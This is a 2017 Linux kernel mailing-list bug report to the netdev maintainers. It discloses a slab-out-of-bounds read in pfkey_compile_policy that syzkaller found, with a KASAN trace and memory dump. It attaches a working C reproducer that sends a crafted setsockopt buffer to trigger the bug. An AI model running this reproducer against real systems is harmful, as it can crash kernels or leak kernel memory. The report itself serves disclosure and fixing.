net/key: slab-out-of-bounds in pfkey_compile_policy

From: Andrey Konovalov <andreyknvl@google.com>
To: Steffen Klassert <steffen.klassert@secunet.com>,
	Herbert Xu <herbert@gondor.apana.org.au>,
	"David S. Miller" <davem@davemloft.net>,
	netdev <netdev@vger.kernel.org>,
	LKML <linux-kernel@vger.kernel.org>
Subject: net/key: slab-out-of-bounds in pfkey_compile_policy
Date: Tue, 2 May 2017 18:45:03 +0200	[thread overview]
Message-ID: <CAAeHK+xqxvEWMXS9sDNi2seUqFzJkijKJhivB8JDehpCJvBAaw@mail.gmail.com> (raw)

[-- Attachment #1: Type: text/plain, Size: 3773 bytes --]

Hi,

I've got the following error report while fuzzing the kernel with syzkaller.

On commit d3b5d35290d729a2518af00feca867385a1b08fa (4.11).

A reproducer and .config are attached.

==================================================================
BUG: KASAN: slab-out-of-bounds in pfkey_compile_policy+0x8e6/0xd40 at
addr ffff88006701f798
Read of size 1280 by task a.out/4181
CPU: 0 PID: 4181 Comm: a.out Not tainted 4.11.0+ #306
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
Call Trace:
 __dump_stack lib/dump_stack.c:16
 dump_stack+0x292/0x395 lib/dump_stack.c:52
 kasan_object_err+0x1c/0x70 mm/kasan/report.c:164
 print_address_description mm/kasan/report.c:202
 kasan_report_error mm/kasan/report.c:291
 kasan_report+0x252/0x510 mm/kasan/report.c:347
 check_memory_region_inline mm/kasan/kasan.c:326
 check_memory_region+0x139/0x190 mm/kasan/kasan.c:333
 memcpy+0x23/0x50 mm/kasan/kasan.c:368
 pfkey_sadb2xfrm_user_sec_ctx net/key/af_key.c:474
 pfkey_compile_policy+0x8e6/0xd40 net/key/af_key.c:3294
 xfrm_user_policy+0x349/0x560 net/xfrm/xfrm_state.c:1892
 do_ip_setsockopt.isra.12+0x1d05/0x38c0 net/ipv4/ip_sockglue.c:1175
 ip_setsockopt+0x3a/0xb0 net/ipv4/ip_sockglue.c:1264
 tcp_setsockopt+0x82/0xd0 net/ipv4/tcp.c:2732
 sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2750
 SYSC_setsockopt net/socket.c:1798
 SyS_setsockopt+0x270/0x3a0 net/socket.c:1777
 entry_SYSCALL_64_fastpath+0x1f/0xbe arch/x86/entry/entry_64.S:204
RIP: 0033:0x7f13a0968b79
RSP: 002b:00007fff131bc3f8 EFLAGS: 00000206 ORIG_RAX: 0000000000000036
RAX: ffffffffffffffda RBX: 00007fff131bc550 RCX: 00007f13a0968b79
RDX: 0000000000000010 RSI: 0000000000000000 RDI: 0000000000000003
RBP: 00000000004004e0 R08: 00000000000000c2 R09: 0000000000000000
R10: 0000000020a2ff3e R11: 0000000000000206 R12: 0000000000000000
R13: 00007fff131bc550 R14: 0000000000000000 R15: 0000000000000000
Object at ffff88006701f780, in cache kmalloc-256 size: 256
Allocated:
PID = 4181
 save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59
 save_stack+0x43/0xd0 mm/kasan/kasan.c:513
 set_track mm/kasan/kasan.c:525
 kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:616
 __kmalloc+0xa0/0x2d0 mm/slub.c:3745
 kmalloc ./include/linux/slab.h:495
 xfrm_user_policy+0xd8/0x560 net/xfrm/xfrm_state.c:1881
 do_ip_setsockopt.isra.12+0x1d05/0x38c0 net/ipv4/ip_sockglue.c:1175
 ip_setsockopt+0x3a/0xb0 net/ipv4/ip_sockglue.c:1264
 tcp_setsockopt+0x82/0xd0 net/ipv4/tcp.c:2732
 sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2750
 SYSC_setsockopt net/socket.c:1798
 SyS_setsockopt+0x270/0x3a0 net/socket.c:1777
 entry_SYSCALL_64_fastpath+0x1f/0xbe arch/x86/entry/entry_64.S:204
Freed:
PID = 3951
 save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59
 save_stack+0x43/0xd0 mm/kasan/kasan.c:513
 set_track mm/kasan/kasan.c:525
 kasan_slab_free+0x73/0xc0 mm/kasan/kasan.c:589
 slab_free_hook mm/slub.c:1357
 slab_free_freelist_hook mm/slub.c:1379
 slab_free mm/slub.c:2961
 kfree+0xe8/0x2b0 mm/slub.c:3882
 free_bprm+0x19d/0x200 fs/exec.c:1382
 do_execveat_common.isra.34+0x19ad/0x2220 fs/exec.c:1778
 do_execve fs/exec.c:1813
 SYSC_execve fs/exec.c:1894
 SyS_execve+0x39/0x50 fs/exec.c:1889
 do_syscall_64+0x2c7/0x7a0 arch/x86/entry/common.c:281
 return_from_SYSCALL_64+0x0/0x7a arch/x86/entry/entry_64.S:246
Memory state around the buggy address:
 ffff88006701f700: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
 ffff88006701f780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>ffff88006701f800: 00 00 00 00 00 00 00 00 02 fc fc fc fc fc fc fc
                                           ^
 ffff88006701f880: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
 ffff88006701f900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================

[-- Attachment #2: pfkey_compile_policy-oob-poc.c --]
[-- Type: text/x-csrc, Size: 2812 bytes --]

// autogenerated by syzkaller (http://github.com/google/syzkaller)

#ifndef __NR_mmap
#define __NR_mmap 9
#endif
#ifndef __NR_socket
#define __NR_socket 41
#endif
#ifndef __NR_setsockopt
#define __NR_setsockopt 54
#endif

#define _GNU_SOURCE

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>

#include <arpa/inet.h>
#include <linux/capability.h>
#include <linux/if.h>
#include <linux/if_ether.h>
#include <linux/if_tun.h>
#include <linux/ip.h>
#include <linux/kvm.h>
#include <linux/sched.h>
#include <linux/tcp.h>
#include <net/if_arp.h>

#include <assert.h>
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static uintptr_t execute_syscall(int nr, uintptr_t a0, uintptr_t a1,
                                 uintptr_t a2, uintptr_t a3,
                                 uintptr_t a4, uintptr_t a5,
                                 uintptr_t a6, uintptr_t a7,
                                 uintptr_t a8)
{
  switch (nr) {
  default:
    return syscall(nr, a0, a1, a2, a3, a4, a5);
  }
}

long r[4];

void main()
{
  memset(r, -1, sizeof(r));
  r[0] = execute_syscall(__NR_mmap, 0x20000000ul, 0xeed000ul, 0x3ul,
                         0x32ul, 0xfffffffffffffffful, 0x0ul, 0, 0, 0);
  r[1] = execute_syscall(__NR_socket, 0x2ul, 0x1ul, 0x0ul, 0, 0, 0, 0,
                         0, 0);
  (memcpy(
      (void*)0x20a2ff3e,
      "\x02\x00\x00\x00\x02\x00\x01\x00\x00\x00\xbe\x8c\x5e\xe1\x8c\x88"
      "\xa1\x00\x01\x00\x00\x00\x00\x05\x01\xda\xfd\x02\xa3\x8a\x3c\xdc"
      "\xf7\xb9\x33\xd8\x98\x05\x55\xf7\x48\x52\xbb\x6a\x88\x07\x56\x7f"
      "\x59\xdb\xa6\x7e\x21\x47\xb3\x55\x04\x00\x6f\xcd\x67\x01\xe2\x01"
      "\x00\x67\x2f\x21\x63\xe0\x20\x9c\xee\x4a\x5a\xcb\x3d\xa4\x83\xf0"
      "\xa4\xcf\x97\xe1\x70\xb6\xc8\x8e\xbb\xff\x06\x01\x00\x00\x00\x01"
      "\x00\x00\x00\xb1\x21\xec\x14\x74\xd7\x10\xf5\x42\x50\x6b\x00\xec"
      "\x00\x8b\xc5\xcf\xb7\xb3\xe7\xec\x08\xe8\x7c\xcc\xff\xf6\xba\x00"
      "\x00\x00\x02\x4f\x02\x98\xe9\xe9\xf5\x54\x06\xaa\x10\xdd\xfd\xff"
      "\x03\x6a\x00\x00\x00\x00\xd7\x91\xa2\xff\xe3\xc5\x73\x2c\x1a\xdb"
      "\x8a\xfc\x5b\xd8\xc2\xd1\x7f\xde\xa2\x1b\x54\x10\x68\x39\x3d\x22"
      "\xb5\xaf\xfa\x00\x04\x1a\xd0\xd2\xc0\x3e\xef\x67\x95\xde\x42\xe3"
      "\x84\x9b",
      194));
  r[3] = execute_syscall(__NR_setsockopt, r[1], 0x0ul, 0x10ul,
                         0x20a2ff3eul, 0xc2ul, 0, 0, 0, 0);
}